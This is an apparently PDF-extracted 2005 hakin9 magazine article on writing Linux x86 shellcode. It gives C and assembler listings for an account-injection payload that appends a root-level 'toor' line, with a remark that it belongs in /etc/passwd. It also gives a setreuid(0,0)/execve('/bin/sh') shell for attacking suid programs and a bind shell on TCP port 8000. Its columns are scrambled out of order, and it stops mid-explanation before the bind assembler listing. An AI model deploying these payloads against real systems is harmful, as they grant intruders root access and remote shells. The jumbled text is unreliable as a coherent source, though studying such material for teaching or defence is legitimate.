2005.05_Linux shellcode optimisation_[Programming].pdf

Linux shellcode optimisation
Michał Piotrowski
A shellcode is an essential part of any exploit. During an attack, it is injected into the target application and performs the desired actions within it. However, the basic rules for building shellcodes are not widely known, even though they don't require advanced skills.
A shellcode (sometimes also called a bytecode) is a sequence of commands in machine code, constituting a vital element of all buffer overflow exploits. During an attack, the exploit injects its shellcode into a running application, causing it to execute the intruder's commands within the target program. The name shellcode originates from the earliest codes of this type, whose purpose was to bring up the system shell (in UNIX-based systems, the shell is the /bin/sh program). The term currently encompasses all manner of codes, performing a huge variety of actions.
Any shellcode has to fulfill a number of requirements. The first is that it cannot contain null bytes (0x00), since these signify the end of a character string and terminate processing for many functions commonly exploited for buffer overflows – strcpy(), strcat(), sprintf(), gets() etc. A shellcode must also be autonomous and operate independently of its current address in memory, so static addressing cannot be used. Other features which can occasionally be significant are the size of the shellcode and the set of ASCII characters it uses.
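To see why null bytes matter, it helps to watch a string function handle a code buffer. The following C sketch is only an illustration under stated assumptions: the helper names count_null_bytes and bytes_copied_by_strcpy are made up for this example, and the two byte arrays are the usual 32-bit x86 encodings of mov eax, 4 and of the pair xor eax, eax / mov al, 4.

```c
#include <stddef.h>
#include <string.h>

/* 32-bit x86 encoding of "mov eax, 4": the immediate is padded with nulls. */
const unsigned char mov_eax_4[] = { 0xb8, 0x04, 0x00, 0x00, 0x00 };

/* Encoding of "xor eax, eax" followed by "mov al, 4": no null bytes. */
const unsigned char xor_mov_al_4[] = { 0x31, 0xc0, 0xb0, 0x04 };

/* Count the 0x00 bytes in a code buffer of the given length. */
size_t count_null_bytes(const unsigned char *code, size_t len)
{
    size_t nulls = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            nulls++;
    return nulls;
}

/* Return how many bytes of the buffer survive a strcpy():
 * copying stops at the first null byte. Buffers of 64 bytes
 * or more are rejected (returns 0) to keep the sketch simple. */
size_t bytes_copied_by_strcpy(const unsigned char *code, size_t len)
{
    char src[64], dst[64];

    if (len >= sizeof src)
        return 0;
    memcpy(src, code, len);
    src[len] = '\0';            /* terminator for the full buffer */
    strcpy(dst, src);           /* stops at the first embedded null */
    return strlen(dst);
}
```

With these arrays, only the first two bytes of the mov eax, 4 encoding would get through strcpy(), while the four-byte null-free sequence is copied whole.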
Let's have a look at writing shellcodes in practice. We will create four programs with different functionality and then go on to modify them so as to compact and adapt them for use in actual exploits. Note that we will be looking exclusively at shellcodes, not buffer overflow attacks or writing exploits.
To create an operational shellcode, we'll need a thorough understanding of assembly language for the shellcode's target processor (see the inset Registers and instructions). We'll be working on 32-bit x86 processors running the Linux operating system with the 2.4 kernel – all examples work with the 2.6 series of the Linux kernel, too – so we have a choice of two main assembler syntax conventions: AT&T and Intel.
What you will learn...
• how to write a working shellcode,
• how to modify and compact it.
What you should know...
• you should be familiar with the Linux operating system,
• you should know the basics of programming in C and assembler.
www.hakin9.org
hakin9 5/2005
Linux shellcodes
Registers and instructions
Registers (see Table 1) are small memory cells within the CPU, used for storing the numerical values required by the processor during program execution. In 32-bit x86 CPUs, the size of the registers is 32 bits (4 bytes). Registers can be divided according to their purpose into data registers (EAX, EBX, ECX, EDX) and address registers (ESI, EDI, ESP, EBP, EIP).
Data registers are divided up into smaller sections of 16 bits (AX, BX, CX, DX) and 8 bits (AH, AL, BH, BL, CH, CL, DH, DL). The smaller registers can be used to decrease code size and get rid of padding null bytes (see Figure 1). Most of the address registers have their own specific uses and should not be used for storing ordinary data.
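The relationship between a 32-bit register and its smaller parts can be modelled with a few shifts and masks. This is a minimal C sketch, not something taken from the article's listings; the function names reg_x, reg_h, reg_l and set_l are hypothetical and simply mirror the AX, AH and AL naming.

```c
#include <stdint.h>

/* Low 16 bits of a 32-bit register value (AX within EAX). */
uint16_t reg_x(uint32_t e)
{
    return (uint16_t)(e & 0xffffu);
}

/* Bits 8..15 of the register value (AH within EAX). */
uint8_t reg_h(uint32_t e)
{
    return (uint8_t)((e >> 8) & 0xffu);
}

/* Lowest 8 bits of the register value (AL within EAX). */
uint8_t reg_l(uint32_t e)
{
    return (uint8_t)(e & 0xffu);
}

/* Model of "mov al, v": only the lowest byte changes,
 * the upper 24 bits keep whatever they held before. */
uint32_t set_l(uint32_t e, uint8_t v)
{
    return (e & 0xffffff00u) | v;
}
```

Note that set_l leaves the upper bytes untouched, so a byte-sized write gives a predictable 32-bit value only if the register was cleared beforehand.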
Table 1. Registers in an x86 processor and their purposes
Register name: Purpose
EAX, AX, AH, AL – accumulator: Arithmetical operations, I/O operations and specifying the required system call. Also holds the value returned by a system call.
EBX, BX, BH, BL – base register: Used for indirect memory addressing. Also holds the first argument of a system call.
ECX, CX, CH, CL – counter: Typically used as a loop counter. Also holds the second argument of a system call.
EDX, DX, DH, DL – data register: Used to store variable addresses. Also holds the third argument of a system call.
ESI – source address, EDI – target address: Typically used for manipulating long data sequences, including strings and arrays.
ESP – stack top pointer: Holds the address of the top of the stack.
EBP – base pointer, frame pointer: Holds the address of the base of the current stack frame. Used to refer to local variables stored in that frame.
Although AT&T syntax is used by the majority of compilers and debuggers (including gcc and gdb), we will use Intel syntax for its greater clarity. All examples will be compiled using the Netwide Assembler (nasm) version 0.98.35, available in most popular Linux distributions. We will also use the ndisasm and hexdump utilities.
Assembly language instructions are basically symbolic processor commands. There are a great many of them, and the most important ones can be divided into:
• move instructions (mov, push, pop),
• arithmetical instructions (add, sub, inc, neg, mul, div),
• logical instructions (and, or, xor, not),
• control flow instructions (jmp, call, int, ret),
Table 1 (continued)
EIP – instruction pointer: Holds the address of the next instruction to be executed.
Table 2. Summary of the most useful assembler instructions
Instruction: Description
mov – move: Copies the source operand into the target operand: mov <target>, <source>.
push – put value on the stack: Copies the source operand onto the top of the stack: push <source>.
pop – get value from the stack: Removes the value at the top of the stack and stores it in the target operand: pop <target>.
add – arithmetic addition: Adds the source operand to the target operand: add <target>, <source>.
sub – arithmetic subtraction: Subtracts the source operand from the target operand: sub <target>, <source>.
xor – exclusive OR: Computes the bitwise exclusive OR of the two operands and stores the result in the target: xor <target>, <source>.
jmp – jump: Writes the specified address to the EIP register: jmp <address>.
call – call: Works like jmp, but before writing to the EIP register it puts the address of the next instruction on the stack: call <address>.
lea – load address: Writes the address of the <source> operand to the <target> register: lea <target>, <source>.
int – interrupt: Raises the software interrupt with the specified number, handing control to the system kernel: int <value>.
Figure 1. Structure of the EAX register
Our final and most advanced program is called bind (see Listing 4). When executed, the program listens on TCP port 8000 and, upon receiving an incoming connection, hands communication over to a shell. This imitates the mode of operation of typical exploits used against network servers.
Figure 2 illustrates the compilation process and the effect of running the programs.
Listing 1. The write.c file
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    char *line = "hello, world!\n";

    /* write the message to standard output (descriptor 1) */
    write(1, line, strlen(line));
    exit(0);
}
Listing 4. The bind.c file
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void)
{
    char *name[2];
    int fd1, fd2;
    struct sockaddr_in serv;

    name[0] = "/bin/sh";
    name[1] = NULL;

    /* listen on all interfaces, TCP port 8000 */
    serv.sin_addr.s_addr = 0;
    serv.sin_port = htons(8000);
    serv.sin_family = AF_INET;

    fd1 = socket(AF_INET, SOCK_STREAM, 0);
    bind(fd1, (struct sockaddr *)&serv, 16);
    listen(fd1, 1);
    fd2 = accept(fd1, 0, 0);

    /* redirect stdin, stdout and stderr to the connection */
    dup2(fd2, 0);
    dup2(fd2, 1);
    dup2(fd2, 2);

    execve(name[0], name, NULL);
}
Listing 2. The add.c file
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    char *name = "/file";
    char *line = "toor:x:0:0::/:/bin/bash\n";
    int fd;

    /* the file must already exist: O_CREAT is not used */
    fd = open(name, O_WRONLY | O_APPEND);
    write(fd, line, strlen(line));
    close(fd);
    exit(0);
}
On to assembler
Now that we know our applications are working as they should, we can go on to rewriting them in assembler. Our general aim is to execute the same system functions as in the C programs, but to do this we need to know the system call numbers assigned to the functions. This information can be obtained from the /usr/include/asm/unistd.h file – the write() function is number 4, exit() is 1, open() is 5, close() is 6, setreuid() is 70, execve() is 11 and dup2() is 63. Socket manipulation functions are a slightly different story – socket(), bind(), listen() and accept() are all served by the same system call, socketcall (number 102).
We also need to provide the functions with the necessary arguments. The first program only uses write() and exit(), so the matter is simple. The write() function takes three arguments: the target file descriptor, a pointer to the source data buffer and the number of bytes to be written. The exit() function only takes one argument – the exit status.
put, appending data to a file, starting the system shell and binding the shell to a TCP port. We will start by writing the programs in C, as it's much easier to translate a ready program into assembler than to write it in assembler from scratch.
The first program is simply called write – Listing 1 presents its source code. Its sole purpose is to write the message stored in the line variable to the standard output.
Listing 2 shows another program, this time called add. Its purpose is to open a file called /file in write mode (the file may be empty, but it has to exist) and append to it the line toor:x:0:0::/:/bin/bash. In reality we should be appending this entry to the /etc/passwd file, but for the time being it will be safer to refrain from modifying the password file.
The third program, called shell, is a classic shellcode. Its task is to run /bin/sh after executing the setreuid(0, 0) function to restore root privileges to the running process (this is necessary when attacking a suid program that drops its privileges for security reasons). Listing 3 shows the source of the shell program.
Listing 3. The shell.c file
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    char *name[2];

    name[0] = "/bin/sh";
    name[1] = NULL;

    /* regain root privileges, then replace the process with a shell */
    setreuid(0, 0);
    execve(name[0], name, NULL);
}
• instructions for manipulating bits, bytes and character strings (shl, shr, rol, ror),
• input/output instructions (in, out),
• flag control instructions.
Write
Listing 5 presents the source code of the assembler equivalent of the write program. Lines 1 and 4 contain declarations for the data section (.data) and code section (.text). Line 6 marks the default ELF linker entry point, which has to be a global symbol due to the use of the ld linker (line 5). Line 2 defines the msg variable – a string of byte-size characters (the db parameter), terminated
We won't go into all the available
instructions, but rather we'll con-
centrate on just the ones we need.
Table 2 presents a brief summary of
the required instructions.
Building the shellcode
Our aim is to write four shellcodes,
performing four different operations:
writing a string to the standard out-
Listing 5. The write1.asm file
1: section .data
2: msg db 'hello, world!', 0x0a
3:
4: section .text
5: global _start
6: _start:
7:
8: ; write(1, msg, 14)
9: mov eax, 4
10: mov ebx, 1
11: mov ecx, msg
12: mov edx, 14
13: int 0x80
14:
15: ; exit(0)
16: mov eax, 1
17: mov ebx, 0
18: int 0x80
specify the function's two parameters:
• the address of the name variable, stored in the EBX register;
• the value 1025 (the numeric representation of the combined O_WRONLY and O_APPEND flags), stored in the ECX register.
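The value 1025 is simply the bitwise OR of the two flags. The sketch below reproduces the arithmetic in C; it assumes the octal values used by the 32-bit x86 Linux headers (01 for O_WRONLY and 02000 for O_APPEND), and the names I386_O_WRONLY, I386_O_APPEND, i386_open_flags and host_flags_match are hypothetical, introduced only for this illustration.

```c
#include <fcntl.h>

/* Flag values as defined for 32-bit x86 Linux (octal).
 * Assumption: other platforms may define them differently. */
#define I386_O_WRONLY 01
#define I386_O_APPEND 02000

/* Combine the two flags: 01 | 02000 = 02001 octal = 1025 decimal. */
int i386_open_flags(void)
{
    return I386_O_WRONLY | I386_O_APPEND;
}

/* Return 1 if the headers of the machine compiling this code
 * produce the same number, 0 otherwise. */
int host_flags_match(void)
{
    return (O_WRONLY | O_APPEND) == i386_open_flags();
}
```

If host_flags_match() returns 0 on a given system, the constant loaded into ECX has to be recalculated from that system's own headers.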
Figure 2. Compilation and execution of the write, add, shell and bind programs
After it is executed, the open() function returns its result (the descriptor number for the opened file) in the EAX register. We'll need the descriptor value to execute the write() and close() functions, so in line 15 we move it into the EBX register. Thus, the next function to be called (i.e. write()) has its first argument (the descriptor number) in the right place (the EBX register). Now we put 4 in the EAX register, the address of the line variable in ECX and 24 (the length of the appended line) in EDX, and transfer execution to the system kernel (line 21).
We then need to close /file by calling close() (the EAX register should contain 6, while EBX still holds the descriptor number for the opened file) and we can end the program by calling exit() (with 1 in EAX and 0 in EBX). Figure 4 presents the compilation and execution of the program.
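For comparison, the same open, write and close sequence can be written in C with the return values checked, something the assembler version skips for brevity. This is a sketch only: the function name append_line is made up for the example, and it uses the C library wrappers rather than raw system calls.

```c
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Append one line to an existing file.
 * Returns the number of bytes written, or -1 on failure. */
long append_line(const char *path, const char *line)
{
    /* No O_CREAT here, so the file has to exist already. */
    int fd = open(path, O_WRONLY | O_APPEND);
    if (fd < 0)
        return -1;

    /* The descriptor returned by open() is reused for write() and close(),
     * just as EBX keeps it across the calls in the assembler program. */
    ssize_t written = write(fd, line, strlen(line));

    if (close(fd) < 0)
        return -1;
    return (long)written;
}
```

Calling append_line("/file", "toor:x:0:0::/:/bin/bash\n") on an existing, writable /file should report 24 bytes, the same length that the assembler program passes to write().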
with a line feed character (0x0a). Lines 8 and 15 are comments and are ignored by the assembler. Lines 9–13 and 16–18 contain instructions preparing and executing the write() and exit() functions. Let's take a closer look at them.
To start with, we write the number of the system call to be executed into the EAX register (write is number 4) and put the function arguments into the appropriate registers: EBX should contain the standard output descriptor (number 1), ECX is filled with the starting address of the string to be written (stored in the msg variable), and EDX holds the string length (14 characters including the line feed). We then execute the instruction int 0x80, which takes execution into kernel mode and executes the relevant system function. The same mechanism applies to the exit() function – we put its number (1) in the EAX register, write 0 to EBX and enter kernel mode once again. Figure 3 presents the compilation and execution of our first program rewritten in assembler.
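The same convention (a call number followed by its arguments) can be tried out from C without writing any assembler. The sketch below is an illustration rather than part of the original listings: it relies on the C library's syscall() function and the SYS_write and SYS_exit constants from <sys/syscall.h>, and the wrapper names raw_write and raw_exit are made up for this example. On 32-bit x86 Linux the constants equal 4 and 1, as in Listing 5; on other architectures the numbers differ, which is why the symbolic names are used.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* exposes syscall() in <unistd.h> on glibc */
#endif
#include <sys/syscall.h>
#include <unistd.h>

/* Invoke the write system call directly: call number first,
 * then descriptor, buffer address and byte count.
 * Returns the number of bytes written, or -1 on error. */
long raw_write(int fd, const void *buf, unsigned long count)
{
    return syscall(SYS_write, fd, buf, count);
}

/* Invoke the exit system call directly; does not return on success. */
void raw_exit(int status)
{
    syscall(SYS_exit, status);
}
```

A call such as raw_write(1, "hello, world!\n", 14) followed by raw_exit(0) corresponds to lines 9–13 and 16–18 of Listing 5.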
Add
Listing 6 shows the code of the assembler rewrite of our second program, add. As you can see, it is slightly more complicated than the previous example.
We start by declaring two character variables in the data section: name and line. They contain, respectively, the name of the file to be modified and the line we want to append. Opening the file /file requires us to put the number of the open() function (5) in the EAX register and
Shell
The shell program needs to be rewrit-
ten in a similar way – Listing 7 shows
Figure 3. Effect of executing the write1 program
called (1 for socket(), 2 for bind(), 4 for listen() and 5 for accept()) and the address of the memory area containing arguments for the subroutine. Let's have a closer look at how the socket() (lines 9–16) and bind() (lines 21–35) functions are called.
As you can see in Listing 4, socket() takes three arguments:
• protocol family (AF_INET – Internet protocols),
• socket type (SOCK_STREAM – connection-oriented),
• the protocol itself (0 – the default for the given family and type, here TCP).
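The three arguments listed above end up as three consecutive words in memory, and it is the address of the first word that socketcall receives. A rough C model of that argument block is shown below; the function names build_socket_args and open_tcp_socket are hypothetical, and the code calls the ordinary socket() wrapper instead of socketcall itself, since the latter is not available on every architecture.

```c
#include <sys/socket.h>

/* Fill a three-word block in the order socket() expects:
 * family first, then type, then protocol. */
void build_socket_args(unsigned long args[3])
{
    args[0] = AF_INET;      /* protocol family */
    args[1] = SOCK_STREAM;  /* socket type */
    args[2] = 0;            /* protocol: default for family and type */
}

/* Create a TCP socket from such a block.
 * Returns the new descriptor, or -1 on failure;
 * the caller is responsible for closing it. */
int open_tcp_socket(void)
{
    unsigned long args[3];

    build_socket_args(args);
    return socket((int)args[0], (int)args[1], (int)args[2]);
}
```

In the assembler version the block is not a named array but a region of the stack, which is why the order in which the values are pushed matters.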
Figure 4. Effect of executing the add1 program
We need to store the arguments somewhere in memory – the best place will be the stack (lines 9–11), but we'll need to push values onto the stack in reverse order, since a stack is a LIFO list, so values are retrieved from last to first. Starting with line 9, we push the third argument onto the stack (0), then the second (1 – SOCK_STREAM) and finally the first (2 – AF_INET). Once that's done, we can specify arguments for the call to socketcall():
the resulting source code. We won't go into detail over it, but rather we'll take a closer look at the seemingly complex execve() function call (lines 15–21).
The first argument of the execve() function is the character string (line 16) specifying the path to the executed program (/bin/sh). The second argument is an array containing at least two elements: the path string and a NULL value. To prepare this array, we must resort to using the stack, first putting the second array element on the stack (NULL – line 17) and then the first element (the address of the name string – line 18). Then we set the second function argument (line 19) using the ESP register, which holds the address of the top of the stack and therefore the starting address of our array. The third and final argument is handled simply by loading 0 into the EDX register (as shown in line 20). The complete program is compiled and run just like our other programs.
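The reason for pushing NULL before the string address becomes clearer with a small model of a stack that grows towards lower addresses. The C sketch below is a simulation only, under stated assumptions: the type sim_stack and the functions sim_init, sim_push and sim_build_argv are hypothetical, the stack is an ordinary array of 32-bit words, and the address passed in stands in for the address of the name string.

```c
#include <stddef.h>
#include <stdint.h>

#define STACK_WORDS 16

/* A tiny downward-growing stack: sp is the index of the top word
 * and equals STACK_WORDS while the stack is empty. */
struct sim_stack {
    uint32_t mem[STACK_WORDS];
    int sp;
};

void sim_init(struct sim_stack *s)
{
    s->sp = STACK_WORDS;
}

/* Model of "push value": move the top down by one word, then store.
 * Returns 0 on success, -1 if the stack is full. */
int sim_push(struct sim_stack *s, uint32_t value)
{
    if (s->sp == 0)
        return -1;
    s->mem[--s->sp] = value;
    return 0;
}

/* Model of "push 0", "push name", "mov ecx, esp": returns the
 * address of the top of the stack, where the array now begins,
 * or NULL if there was no room for both words. */
const uint32_t *sim_build_argv(struct sim_stack *s, uint32_t name_addr)
{
    if (sim_push(s, 0) != 0)            /* second element: NULL */
        return NULL;
    if (sim_push(s, name_addr) != 0)    /* first element: address of the path */
        return NULL;
    return &s->mem[s->sp];
}
```

Reading upwards from the returned pointer gives the string address followed by zero, which is exactly the array layout execve() expects for its second argument.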
Listing 6. The add1.asm file
1: section .data
2: name db '/file', 0
3: line db 'toor:x:0:0::/:/bin/bash', 0x0a
4:
5: section .text
6: global _start
7: _start:
8:
9: ; open(name, O_WRONLY|O_APPEND)
10: mov eax, 5
11: mov ebx, name
12: mov ecx, 1025
13: int 0x80
14:
15: mov ebx, eax
16:
17: ; write(fd, line, 24)
18: mov eax, 4
19: mov ecx, line
20: mov edx, 24
21: int 0x80
22:
23: ; close(fd)
24: mov eax, 6
25: int 0x80
26:
27: ; exit(0)
28: mov eax, 1
29: mov ebx, 0
30: int 0x80
• load 102 into EAX (line 13),
• load EBX with the socket() sub-
routine number (line 14),
• load ECX with the address of
socket() subroutine arguments
Listing 7. The shell1.asm file
1: section .data
2: name db '/bin/sh', 0
3:
4: section .text
5: global _start
6: _start:
7:
8: ; setreuid(0, 0)
9: mov eax, 70
10: mov ebx, 0
11: mov ecx, 0
12: int 0x80
13:
14: ; execve("/bin/sh", ["/bin/sh", NULL], NULL)
15: mov eax, 11
16: mov ebx, name
17: push 0
18: push name
19: mov ecx, esp
20: mov edx, 0
21: int 0x80
Bind
The last of our shellcodes is the most complicated and requires a more detailed explanation due to the specific way of calling socket functions. Listing 8 presents the assembler version of the bind program.
The socket(), bind(), listen() and accept() functions are served by the same system call (socketcall), which takes two arguments: the number of the subroutine to be